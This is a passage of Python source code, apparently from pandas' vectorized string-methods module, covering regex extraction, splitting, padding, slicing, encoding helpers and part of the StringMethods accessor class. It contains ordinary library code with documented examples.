re module flags, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
Returns
-------
Series/array of boolean values
See Also
--------
contains : Analogous, but less strict, relying on re.search instead of
re.match.
extract : Extract matched groups.
"""
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
dtype = bool
f = lambda x: bool(regex.match(x))
return _na_map(f, arr, na, dtype=dtype)
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _groups_or_na_fun(regex):
"""Used in both extract_noexpand and extract_frame"""
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
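# For example, with regex re.compile(r'([ab])(\d)') the returned function maps
# 'a1' -> ['a', '1'], while a non-matching or non-string value yields the
# all-NaN row [nan, nan].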
def _str_extract_noexpand(arr, pat, flags=0):
"""
Find groups in each string in the Series using passed regular
expression. This function is called from
str_extract(expand=False), and can return Series, DataFrame, or
Index.
"""
from pandas import DataFrame, Index
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
if regex.groups == 1:
result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
name = _get_single_group_name(regex)
else:
if isinstance(arr, Index):
raise ValueError("only one regex group is supported with Index")
name = None
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if arr.empty:
result = DataFrame(columns=columns, dtype=object)
else:
result = DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=arr.index,
dtype=object,
)
return result, name
def _str_extract_frame(arr, pat, flags=0):
"""
For each subject string in the Series, extract groups from the
first match of regular expression pat. This function is called from
str_extract(expand=True), and always returns a DataFrame.
"""
from pandas import DataFrame
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if len(arr) == 0:
return DataFrame(columns=columns, dtype=object)
try:
result_index = arr.index
except AttributeError:
result_index = None
return DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=result_index,
dtype=object,
)
def str_extract(arr, pat, flags=0, expand=True):
r"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the
first match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
Flags from the ``re`` module, e.g. ``re.IGNORECASE``, that
modify regular expression matching for things like case,
spaces, etc. For more details, see :mod:`re`.
expand : bool, default True
If True, return DataFrame with one column per capture group.
If False, return a Series/Index if there is one capture group
or DataFrame if there are multiple capture groups.
.. versionadded:: 0.18.0
Returns
-------
DataFrame or Series or Index
A DataFrame with one row for each subject string, and one
column for each group. Any capture group names in regular
expression pat will be used for column names; otherwise
capture group numbers will be used. The dtype of each result
column is always object, even when no match is found. If
``expand=False`` and pat has only one capture group, then
return a Series (if subject is a Series) or Index (if subject
is an Index).
See Also
--------
extractall : Returns all matches (not just the first match).
Examples
--------
A pattern with two groups will return a DataFrame with two columns.
Non-matches will be NaN.
>>> s = pd.Series(['a1', 'b2', 'c3'])
>>> s.str.extract(r'([ab])(\d)')
0 1
0 a 1
1 b 2
2 NaN NaN
A pattern may contain optional groups.
>>> s.str.extract(r'([ab])?(\d)')
0 1
0 a 1
1 b 2
2 NaN 3
Named groups will become column names in the result.
>>> s.str.extract(r'(?P<letter>[ab])(?P<digit>\d)')
letter digit
0 a 1
1 b 2
2 NaN NaN
A pattern with one group will return a DataFrame with one column
if expand=True.
>>> s.str.extract(r'[ab](\d)', expand=True)
0
0 1
1 2
2 NaN
A pattern with one group will return a Series if expand=False.
>>> s.str.extract(r'[ab](\d)', expand=False)
0 1
1 2
2 NaN
dtype: object
"""
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand:
return _str_extract_frame(arr._orig, pat, flags=flags)
else:
result, name = _str_extract_noexpand(arr._parent, pat, flags=flags)
return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
r"""
For each subject string in the Series, extract groups from all
matches of regular expression pat. When each subject string in the
Series has exactly one match, extractall(pat).xs(0, level='match')
is the same as extract(pat).
.. versionadded:: 0.18.0
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
A ``re`` module flag, for example ``re.IGNORECASE``. These allow
to modify regular expression matching for things like case, spaces,
etc. Multiple flags can be combined with the bitwise OR operator,
for example ``re.IGNORECASE | re.MULTILINE``.
Returns
-------
DataFrame
A ``DataFrame`` with one row for each match, and one column for each
group. Its rows have a ``MultiIndex`` with first levels that come from
the subject ``Series``. The last level is named 'match' and indexes the
matches in each item of the ``Series``. Any capture group names in
regular expression pat will be used for column names; otherwise capture
group numbers will be used.
See Also
--------
extract : Returns first match only (not all matches).
Examples
--------
A pattern with one group will return a DataFrame with one column.
Indices with no matches will not appear in the result.
>>> s = pd.Series(["a1a2", "b1", "c1"], index=["A", "B", "C"])
>>> s.str.extractall(r"[ab](\d)")
0
match
A 0 1
1 2
B 0 1
Capture group names are used for column names of the result.
>>> s.str.extractall(r"[ab](?P<digit>\d)")
digit
match
A 0 1
1 2
B 0 1
A pattern with two groups will return a DataFrame with two columns.
>>> s.str.extractall(r"(?P<letter>[ab])(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
Optional groups that do not match are NaN in the result.
>>> s.str.extractall(r"(?P<letter>[ab])?(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
C 0 NaN 1
"""
regex = re.compile(pat, flags=flags)
# the regex must contain capture groups.
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
if isinstance(arr, ABCIndexClass):
arr = arr.to_series().reset_index(drop=True)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
match_list = []
index_list = []
is_mi = arr.index.nlevels > 1
for subject_key, subject in arr.items():
if isinstance(subject, str):
if not is_mi:
subject_key = (subject_key,)
for match_i, match_tuple in enumerate(regex.findall(subject)):
if isinstance(match_tuple, str):
match_tuple = (match_tuple,)
na_tuple = [np.NaN if group == "" else group for group in match_tuple]
match_list.append(na_tuple)
result_key = tuple(subject_key + (match_i,))
index_list.append(result_key)
from pandas import MultiIndex
index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
result = arr._constructor_expanddim(match_list, index=index, columns=columns)
return result
def str_get_dummies(arr, sep="|"):
"""
Split each string in the Series by sep and return a DataFrame
of dummy/indicator variables.
Parameters
----------
sep : str, default "|"
String to split on.
Returns
-------
DataFrame
Dummy variables corresponding to values of the Series.
See Also
--------
get_dummies : Convert categorical variable into dummy/indicator
variables.
Examples
--------
>>> pd.Series(['a|b', 'a', 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 1 0 0
2 1 0 1
>>> pd.Series(['a|b', np.nan, 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 0 0 0
2 1 0 1
"""
arr = arr.fillna("")
try:
arr = sep + arr + sep
except TypeError:
arr = sep + arr.astype(str) + sep
tags = set()
for ts in arr.str.split(sep):
tags.update(ts)
tags = sorted(tags - {""})
dummies = np.empty((len(arr), len(tags)), dtype=np.int64)
for i, t in enumerate(tags):
pat = sep + t + sep
dummies[:, i] = lib.map_infer(arr.values, lambda x: pat in x)
return dummies, tags
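# Note that this helper returns the raw (values, labels) pair rather than a
# wrapped Series/DataFrame; the calling accessor method is expected to pass
# the result through _wrap_result(..., expand=True).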
def str_join(arr, sep):
"""
Join lists contained as elements in the Series/Index with passed delimiter.
If the elements of a Series are lists themselves, join the content of these
lists using the delimiter passed to the function.
This function is an equivalent to :meth:`str.join`.
Parameters
----------
sep : str
Delimiter to use between list entries.
Returns
-------
Series/Index: object
The list entries concatenated by intervening occurrences of the
delimiter.
Raises
------
AttributeError
If the supplied Series contains neither strings nor lists.
See Also
--------
str.join : Standard library version of this method.
Series.str.split : Split strings around given separator/delimiter.
Notes
-----
If any of the list items is not a string object, the result of the join
will be `NaN`.
Examples
--------
Example with a list that contains non-string elements.
>>> s = pd.Series([['lion', 'elephant', 'zebra'],
... [1.1, 2.2, 3.3],
... ['cat', np.nan, 'dog'],
... ['cow', 4.5, 'goat'],
... ['duck', ['swan', 'fish'], 'guppy']])
>>> s
0 [lion, elephant, zebra]
1 [1.1, 2.2, 3.3]
2 [cat, nan, dog]
3 [cow, 4.5, goat]
4 [duck, [swan, fish], guppy]
dtype: object
Join all lists using a '-'. The lists containing object(s) of types other
than str will produce a NaN.
>>> s.str.join('-')
0 lion-elephant-zebra
1 NaN
2 NaN
3 NaN
4 NaN
dtype: object
"""
return _na_map(sep.join, arr)
def str_findall(arr, pat, flags=0):
"""
Find all occurrences of pattern or regular expression in the Series/Index.
Equivalent to applying :func:`re.findall` to all the elements in the
Series/Index.
Parameters
----------
pat : str
Pattern or regular expression.
flags : int, default 0
Flags from ``re`` module, e.g. `re.IGNORECASE` (default is 0, which
means no flags).
Returns
-------
Series/Index of lists of strings
All non-overlapping matches of pattern or regular expression in each
string of this Series/Index.
See Also
--------
count : Count occurrences of pattern or regular expression in each string
of the Series/Index.
extractall : For each string in the Series, extract groups from all matches
of regular expression and return a DataFrame with one row for each
match and one column for each group.
re.findall : The equivalent ``re`` function to all non-overlapping matches
of pattern or regular expression in string, as a list of strings.
Examples
--------
>>> s = pd.Series(['Lion', 'Monkey', 'Rabbit'])
The search for the pattern 'Monkey' returns one match:
>>> s.str.findall('Monkey')
0 []
1 [Monkey]
2 []
dtype: object
On the other hand, the search for the pattern 'MONKEY' doesn't return any
match:
>>> s.str.findall('MONKEY')
0 []
1 []
2 []
dtype: object
Flags can be added to the pattern or regular expression. For instance,
to find the pattern 'MONKEY' ignoring the case:
>>> import re
>>> s.str.findall('MONKEY', flags=re.IGNORECASE)
0 []
1 [Monkey]
2 []
dtype: object
When the pattern matches more than one string in the Series, all matches
are returned:
>>> s.str.findall('on')
0 [on]
1 [on]
2 []
dtype: object
Regular expressions are supported too. For instance, the search for all the
strings ending with the word 'on' is shown next:
>>> s.str.findall('on$')
0 [on]
1 []
2 []
dtype: object
If the pattern is found more than once in the same string, then a list of
multiple strings is returned:
>>> s.str.findall('b')
0 []
1 []
2 [b, b]
dtype: object
"""
regex = re.compile(pat, flags=flags)
return _na_map(regex.findall, arr)
def str_find(arr, sub, start=0, end=None, side="left"):
"""
Return indexes in each strings in the Series/Index where the
substring is fully contained between [start:end]. Return -1 on failure.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
side : {'left', 'right'}, default 'left'
Specifies a starting side, equivalent to ``find`` or ``rfind``.
Returns
-------
Series or Index
Indexes where substring is found.
"""
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "find"
elif side == "right":
method = "rfind"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
def str_index(arr, sub, start=0, end=None, side="left"):
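    """
    Return the lowest (side='left') or highest (side='right') index in each
    string where the substring is fully contained between [start:end].
    Similar to :func:`str_find`, but raises ``ValueError`` when the substring
    is not found (mirroring :meth:`str.index` / :meth:`str.rindex`) instead
    of returning -1.
    """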
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "index"
elif side == "right":
method = "rindex"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
def str_pad(arr, width, side="left", fillchar=" "):
"""
Pad strings in the Series/Index up to width.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with character defined in `fillchar`.
side : {'left', 'right', 'both'}, default 'left'
Side from which to fill resulting string.
fillchar : str, default ' '
Additional character for filling, default is whitespace.
Returns
-------
Series or Index of object
Returns Series or Index with minimum number of char in object.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='left')``.
Series.str.ljust : Fills the right side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='right')``.
Series.str.center : Fills boths sides of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='both')``.
Series.str.zfill : Pad strings in the Series/Index by prepending '0'
character. Equivalent to ``Series.str.pad(side='left', fillchar='0')``.
Examples
--------
>>> s = pd.Series(["caribou", "tiger"])
>>> s
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10)
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10, side='right', fillchar='-')
0 caribou---
1 tiger-----
dtype: object
>>> s.str.pad(width=10, side='both', fillchar='-')
0 -caribou--
1 --tiger---
dtype: object
"""
if not isinstance(fillchar, str):
msg = "fillchar must be a character, not {0}"
raise TypeError(msg.format(type(fillchar).__name__))
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = "width must be of integer type, not {0}"
raise TypeError(msg.format(type(width).__name__))
if side == "left":
f = lambda x: x.rjust(width, fillchar)
elif side == "right":
f = lambda x: x.ljust(width, fillchar)
elif side == "both":
f = lambda x: x.center(width, fillchar)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
def str_split(arr, pat=None, n=None):
if pat is None:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if len(pat) == 1:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if n is None or n == -1:
n = 0
regex = re.compile(pat)
f = lambda x: regex.split(x, maxsplit=n)
res = _na_map(f, arr)
return res
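# Dispatch: a missing or single-character `pat` goes through str.split (with
# n=-1 meaning "all splits"), while a longer `pat` is compiled and handed to
# re.split, where maxsplit=0 means "no limit"; e.g. splitting 'a_b_c' on '_'
# with n=1 leaves ['a', 'b_c'] for that element.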
def str_rsplit(arr, pat=None, n=None):
if n is None or n == 0:
n = -1
f = lambda x: x.rsplit(pat, n)
res = _na_map(f, arr)
return res
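# Unlike str_split, rsplit has no regex path here: `pat` is always treated as
# a literal separator and handed to str.rsplit.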
def str_slice(arr, start=None, stop=None, step=None):
"""
Slice substrings from each element in the Series or Index.
Parameters
----------
start : int, optional
Start position for slice operation.
stop : int, optional
Stop position for slice operation.
step : int, optional
Step size for slice operation.
Returns
-------
Series or Index of object
Series or Index from sliced substring from original string object.
See Also
--------
Series.str.slice_replace : Replace a slice with a string.
Series.str.get : Return element at position.
Equivalent to `Series.str.slice(start=i, stop=i+1)` with `i`
being the position.
Examples
--------
>>> s = pd.Series(["koala", "fox", "chameleon"])
>>> s
0 koala
1 fox
2 chameleon
dtype: object
>>> s.str.slice(start=1)
0 oala
1 ox
2 hameleon
dtype: object
>>> s.str.slice(stop=2)
0 ko
1 fo
2 ch
dtype: object
>>> s.str.slice(step=2)
0 kaa
1 fx
2 caeen
dtype: object
>>> s.str.slice(start=0, stop=5, step=3)
0 kl
1 f
2 cm
dtype: object
Equivalent behaviour to:
>>> s.str[0:5:3]
0 kl
1 f
2 cm
dtype: object
"""
obj = slice(start, stop, step)
f = lambda x: x[obj]
return _na_map(f, arr)
def str_slice_replace(arr, start=None, stop=None, repl=None):
"""
Replace a positional slice of a string with another value.
Parameters
----------
start : int, optional
Left index position to use for the slice. If not specified (None),
the slice is unbounded on the left, i.e. slice from the start
of the string.
stop : int, optional
Right index position to use for the slice. If not specified (None),
the slice is unbounded on the right, i.e. slice until the
end of the string.
repl : str, optional
String for replacement. If not specified (None), the sliced region
is replaced with an empty string.
Returns
-------
Series or Index
Same type as the original object.
See Also
--------
Series.str.slice : Just slicing without replacement.
Examples
--------
>>> s = pd.Series(['a', 'ab', 'abc', 'abdc', 'abcde'])
>>> s
0 a
1 ab
2 abc
3 abdc
4 abcde
dtype: object
Specify just `start`, meaning replace `start` until the end of the
string with `repl`.
>>> s.str.slice_replace(1, repl='X')
0 aX
1 aX
2 aX
3 aX
4 aX
dtype: object
Specify just `stop`, meaning the start of the string to `stop` is replaced
with `repl`, and the rest of the string is included.
>>> s.str.slice_replace(stop=2, repl='X')
0 X
1 X
2 Xc
3 Xdc
4 Xcde
dtype: object
Specify `start` and `stop`, meaning the slice from `start` to `stop` is
replaced with `repl`. Everything before or after `start` and `stop` is
included as is.
>>> s.str.slice_replace(start=1, stop=3, repl='X')
0 aX
1 aX
2 aX
3 aXc
4 aXde
dtype: object
"""
if repl is None:
repl = ""
def f(x):
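        # When the requested slice is empty (e.g. `start` is at or beyond the
        # end of x), keep the tail from `start` instead of `stop`, so `repl`
        # is inserted without discarding any characters.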
if x[start:stop] == "":
local_stop = start
else:
local_stop = stop
y = ""
if start is not None:
y += x[:start]
y += repl
if stop is not None:
y += x[local_stop:]
return y
return _na_map(f, arr)
def str_strip(arr, to_strip=None, side="both"):
"""
Strip whitespace (including newlines) from each string in the
Series/Index.
Parameters
----------
to_strip : str or unicode
side : {'left', 'right', 'both'}, default 'both'
Returns
-------
Series or Index
"""
if side == "both":
f = lambda x: x.strip(to_strip)
elif side == "left":
f = lambda x: x.lstrip(to_strip)
elif side == "right":
f = lambda x: x.rstrip(to_strip)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
def str_wrap(arr, width, **kwargs):
r"""
Wrap long strings in the Series/Index to be formatted in
paragraphs with length less than a given width.
This method has the same keyword parameters and defaults as
:class:`textwrap.TextWrapper`.
Parameters
----------
width : int
Maximum line width.
expand_tabs : bool, optional
If True, tab characters will be expanded to spaces (default: True).
replace_whitespace : bool, optional
If True, each whitespace character (as defined by string.whitespace)
remaining after tab expansion will be replaced by a single space
(default: True).
drop_whitespace : bool, optional
If True, whitespace that, after wrapping, happens to end up at the
beginning or end of a line is dropped (default: True).
break_long_words : bool, optional
If True, then words longer than width will be broken in order to ensure
that no lines are longer than width. If it is false, long words will
not be broken, and some lines may be longer than width (default: True).
break_on_hyphens : bool, optional
If True, wrapping will occur preferably on whitespace and right after
hyphens in compound words, as it is customary in English. If false,
only whitespaces will be considered as potentially good places for line
breaks, but you need to set break_long_words to false if you want truly
insecable words (default: True).
Returns
-------
Series or Index
Notes
-----
Internally, this method uses a :class:`textwrap.TextWrapper` instance with
default settings. To achieve behavior matching R's stringr library str_wrap
function, use the arguments:
- expand_tabs = False
- replace_whitespace = True
- drop_whitespace = True
- break_long_words = False
- break_on_hyphens = False
Examples
--------
>>> s = pd.Series(['line to be wrapped', 'another line to be wrapped'])
>>> s.str.wrap(12)
0 line to be\nwrapped
1 another line\nto be\nwrapped
dtype: object
"""
kwargs["width"] = width
tw = textwrap.TextWrapper(**kwargs)
return _na_map(lambda s: "\n".join(tw.wrap(s)), arr)
def str_translate(arr, table):
"""
Map all characters in the string through the given mapping table.
Equivalent to standard :meth:`str.translate`.
Parameters
----------
table : dict
table is a mapping of Unicode ordinals to Unicode ordinals, strings, or
None. Unmapped characters are left untouched.
Characters mapped to None are deleted. :meth:`str.maketrans` is a
helper function for making translation tables.
Returns
-------
Series or Index
"""
return _na_map(lambda x: x.translate(table), arr)
def str_get(arr, i):
"""
Extract element from each component at specified position.
Extract element from lists, tuples, or strings in each element in the
Series/Index.
Parameters
----------
i : int
Position of element to extract.
Returns
-------
Series or Index
Examples
--------
>>> s = pd.Series(["String",
... (1, 2, 3),
... ["a", "b", "c"],
... 123,
... -456,
... {1: "Hello", "2": "World"}])
>>> s
0 String
1 (1, 2, 3)
2 [a, b, c]
3 123
4 -456
5 {1: 'Hello', '2': 'World'}
dtype: object
>>> s.str.get(1)
0 t
1 2
2 b
3 NaN
4 NaN
5 Hello
dtype: object
>>> s.str.get(-1)
0 g
1 3
2 c
3 NaN
4 NaN
5 None
dtype: object
"""
def f(x):
if isinstance(x, dict):
return x.get(i)
elif len(x) > i >= -len(x):
return x[i]
return np.nan
return _na_map(f, arr)
def str_decode(arr, encoding, errors="strict"):
"""
Decode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.decode` in python2 and :meth:`bytes.decode` in
python3.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
Series or Index
"""
if encoding in _cpython_optimized_decoders:
# CPython optimized implementation
f = lambda x: x.decode(encoding, errors)
else:
decoder = codecs.getdecoder(encoding)
f = lambda x: decoder(x, errors)[0]
return _na_map(f, arr)
def str_encode(arr, encoding, errors="strict"):
"""
Encode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.encode`.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
encoded : Series/Index of objects
"""
if encoding in _cpython_optimized_encoders:
# CPython optimized implementation
f = lambda x: x.encode(encoding, errors)
else:
encoder = codecs.getencoder(encoding)
f = lambda x: encoder(x, errors)[0]
return _na_map(f, arr)
def forbid_nonstring_types(forbidden, name=None):
"""
Decorator to forbid specific types for a method of StringMethods.
For calling `.str.{method}` on a Series or Index, it is necessary to first
initialize the :class:`StringMethods` object, and then call the method.
However, different methods allow different input types, and so this can not
be checked during :meth:`StringMethods.__init__`, but must be done on a
per-method basis. This decorator exists to facilitate this process, and
make it explicit which (inferred) types are disallowed by the method.
:meth:`StringMethods.__init__` allows the *union* of types its different
methods allow (after skipping NaNs; see :meth:`StringMethods._validate`),
namely: ['string', 'empty', 'bytes', 'mixed', 'mixed-integer'].
The default string types ['string', 'empty'] are allowed for all methods.
For the additional types ['bytes', 'mixed', 'mixed-integer'], each method
then needs to forbid the types it is not intended for.
Parameters
----------
forbidden : list-of-str or None
List of forbidden non-string types, may be one or more of
`['bytes', 'mixed', 'mixed-integer']`.
name : str, default None
Name of the method to use in the error message. By default, this is
None, in which case the name from the method being wrapped will be
copied. However, for working with further wrappers (like _pat_wrapper
and _noarg_wrapper), it is necessary to specify the name.
Returns
-------
func : wrapper
The method to which the decorator is applied, with an added check that
enforces the inferred type to not be in the list of forbidden types.
Raises
------
TypeError
If the inferred type of the underlying data is in `forbidden`.
"""
# deal with None
forbidden = [] if forbidden is None else forbidden
allowed_types = {"string", "empty", "bytes", "mixed", "mixed-integer"} - set(
forbidden
)
def _forbid_nonstring_types(func):
func_name = func.__name__ if name is None else name
@wraps(func)
def wrapper(self, *args, **kwargs):
if self._inferred_dtype not in allowed_types:
msg = (
"Cannot use .str.{name} with values of inferred dtype "
"{inf_type!r}.".format(
name=func_name, inf_type=self._inferred_dtype
)
)
raise TypeError(msg)
return func(self, *args, **kwargs)
wrapper.__name__ = func_name
return wrapper
return _forbid_nonstring_types
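# forbid_nonstring_types is applied either directly to accessor methods
# (e.g. ``@forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])`` on
# ``cat`` below) or indirectly through the _noarg_wrapper/_pat_wrapper
# factories that follow, which pass ``forbidden_types`` along with an
# explicit ``name`` for the error message.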
def _noarg_wrapper(f, name=None, docstring=None, forbidden_types=["bytes"], **kargs):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper(self):
result = _na_map(f, self._parent, **kargs)
return self._wrap_result(result)
wrapper.__name__ = f.__name__ if name is None else name
if docstring is not None:
wrapper.__doc__ = docstring
else:
raise ValueError("Provide docstring")
return wrapper
def _pat_wrapper(
f, flags=False, na=False, name=None, forbidden_types=["bytes"], **kwargs
):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper1(self, pat):
result = f(self._parent, pat)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper2(self, pat, flags=0, **kwargs):
result = f(self._parent, pat, flags=flags, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper3(self, pat, na=np.nan):
result = f(self._parent, pat, na=na)
return self._wrap_result(result)
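    # Choose the wrapper signature from the requested keywords: `na` wins over
    # `flags`, and the bare (self, pat) form is the fallback.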
wrapper = wrapper3 if na else wrapper2 if flags else wrapper1
wrapper.__name__ = f.__name__ if name is None else name
if f.__doc__:
wrapper.__doc__ = f.__doc__
return wrapper
def copy(source):
"Copy a docstring from another source function (if present)"
def do_copy(target):
if source.__doc__:
target.__doc__ = source.__doc__
return target
return do_copy
class StringMethods(NoNewAttributesMixin):
"""
Vectorized string functions for Series and Index. NAs stay NA unless
handled otherwise by a particular method. Patterned after Python's string
methods, with some inspiration from R's stringr package.
Examples
--------
>>> s.str.split('_')
>>> s.str.replace('_', '')
"""
def __init__(self, data):
self._inferred_dtype = self._validate(data)
self._is_categorical = is_categorical_dtype(data)
# .values.categories works for both Series/Index
self._parent = data.values.categories if self._is_categorical else data
# save orig to blow up categoricals to the right type
self._orig = data
self._freeze()
@staticmethod
def _validate(data):
"""
Auxiliary function for StringMethods, infers and checks dtype of data.
This is a "first line of defence" at the creation of the StringMethods-
object (see _make_accessor), and just checks that the dtype is in the
*union* of the allowed types over all string methods below; this
restriction is then refined on a per-method basis using the decorator
@forbid_nonstring_types (more info in the corresponding docstring).
This really should exclude all series/index with any non-string values,
but that isn't practical for performance reasons until we have a str
dtype (GH 9343 / 13877)
Parameters
----------
data : The content of the Series
Returns
-------
dtype : inferred dtype of data
"""
if isinstance(data, ABCMultiIndex):
raise AttributeError(
"Can only use .str accessor with Index, " "not MultiIndex"
)
# see _libs/lib.pyx for list of inferred types
allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
values = getattr(data, "values", data) # Series / Index
values = getattr(values, "categories", values) # categorical / normal
try:
inferred_dtype = lib.infer_dtype(values, skipna=True)
except ValueError:
# GH#27571 mostly occurs with ExtensionArray
inferred_dtype = None
if inferred_dtype not in allowed_types:
raise AttributeError("Can only use .str accessor with string " "values!")
return inferred_dtype
def __getitem__(self, key):
if isinstance(key, slice):
return self.slice(start=key.start, stop=key.stop, step=key.step)
else:
return self.get(key)
def __iter__(self):
i = 0
g = self.get(i)
while g.notna().any():
yield g
i += 1
g = self.get(i)
def _wrap_result(
self, result, use_codes=True, name=None, expand=None, fill_value=np.nan
):
from pandas import Index, Series, MultiIndex
# for category, we do the stuff on the categories, so blow it up
# to the full series again
# But for some operations, we have to do the stuff on the full values,
# so make it possible to skip this step as the method already did this
# before the transformation...
if use_codes and self._is_categorical:
# if self._orig is a CategoricalIndex, there is no .cat-accessor
result = take_1d(
result, Series(self._orig, copy=False).cat.codes, fill_value=fill_value
)
if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
return result
assert result.ndim < 3
if expand is None:
# infer from ndim if expand is not specified
expand = result.ndim != 1
elif expand is True and not isinstance(self._orig, Index):
# required when expand=True is explicitly specified
# not needed when inferred
def cons_row(x):
if is_list_like(x):
return x
else:
return [x]
result = [cons_row(x) for x in result]
if result:
# propagate nan values to match longest sequence (GH 18450)
max_len = max(len(x) for x in result)
result = [
x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
]
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand is False:
# if expand is False, result should have the same name
# as the original otherwise specified
if name is None:
name = getattr(result, "name", None)
if name is None:
# do not use logical or, _orig may be a DataFrame
# which has "name" column
name = self._orig.name
# Wait until we are sure result is a Series or Index before
# checking attributes (GH 12180)
if isinstance(self._orig, Index):
# if result is a boolean np.array, return the np.array
# instead of wrapping it into a boolean Index (GH 8875)
if is_bool_dtype(result):
return result
if expand:
result = list(result)
out = MultiIndex.from_tuples(result, names=name)
if out.nlevels == 1:
# We had all tuples of length-one, which are
# better represented as a regular Index.
out = out.get_level_values(0)
return out
else:
return Index(result, name=name)
else:
index = self._orig.index
if expand:
cons = self._orig._constructor_expanddim
return cons(result, columns=name, index=index)
else:
# Must be a Series
cons = self._orig._constructor
return cons(result, name=name, index=index)
def _get_series_list(self, others, ignore_index=False):
"""
Auxiliary function for :meth:`str.cat`. Turn potentially mixed input
into a list of Series (elements without an index must match the length
of the calling Series/Index).
Parameters
----------
others : Series, Index, DataFrame, np.ndarray, list-like or list-like
of objects that are Series, Index or np.ndarray (1-dim)
ignore_index : boolean, default False
Determines whether to forcefully align others with index of caller
Returns
-------
tuple : (others transformed into list of Series,
boolean whether FutureWarning should be raised)
"""
# Once str.cat defaults to alignment, this function can be simplified;
# will not need `ignore_index` and the second boolean output anymore
from pandas import Index, Series, DataFrame
# self._orig is either Series or Index
idx = self._orig if isinstance(self._orig, Index) else self._orig.index
err_msg = (
"others must be Series, Index, DataFrame, np.ndarray or "
"list-like (either containing only strings or containing "
"only objects of type Series/Index/list-like/np.ndarray)"
)
# Generally speaking, all objects without an index inherit the index
# `idx` of the calling Series/Index - i.e. must have matching length.
# Objects with an index (i.e. Series/Index/DataFrame) keep their own
# index, *unless* ignore_index is set to True.
if isinstance(others, Series):
warn = not others.index.equals(idx)
# only reconstruct Series when absolutely necessary
los = [
Series(others.values, index=idx) if ignore_index and warn else others
]
return (los, warn)
elif isinstance(others, Index):
warn = not others.equals(idx)
los = [Series(others.values, index=(idx if ignore_index else others))]
return (los, warn)
elif isinstance(others, DataFrame):
warn = not others.index.equals(idx)
if ignore_index and warn:
# without copy, this could change "others"
# that was passed to str.cat
others = others.copy()
others.index = idx
return ([others[x] for x in others], warn)
elif isinstance(others, np.ndarray) and others.ndim == 2:
others = DataFrame(others, index=idx)
return ([others[x] for x in others], False)
elif is_list_like(others, allow_sets=False):
others = list(others) # ensure iterators do not get read twice etc
# in case of list-like `others`, all elements must be
# either one-dimensional list-likes or scalars
if all(is_list_like(x, allow_sets=False) for x in others):
los = []
join_warn = False
depr_warn = False
# iterate through list and append list of series for each
# element (which we check to be one-dimensional and non-nested)
while others:
nxt = others.pop(0) # nxt is guaranteed list-like by above
# GH 21950 - DeprecationWarning
